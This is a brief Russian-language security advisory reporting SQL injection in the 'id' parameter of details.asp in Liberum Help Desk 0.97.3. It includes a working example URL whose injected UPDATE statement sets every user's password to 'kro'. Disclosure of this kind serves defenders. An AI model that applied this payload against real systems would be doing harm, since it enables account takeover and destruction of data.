Программа: Liberum Help Desk 0.97.3
Уязвимость позволяет злоумышленнику выполнить произвольный SQL код в базе данных приложения на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «id» сценарием details.asp. Атакующий может выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[target]/[path]//details.asp?id=[SQL]
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'—
=> Для изменения всех паролей на "kro"
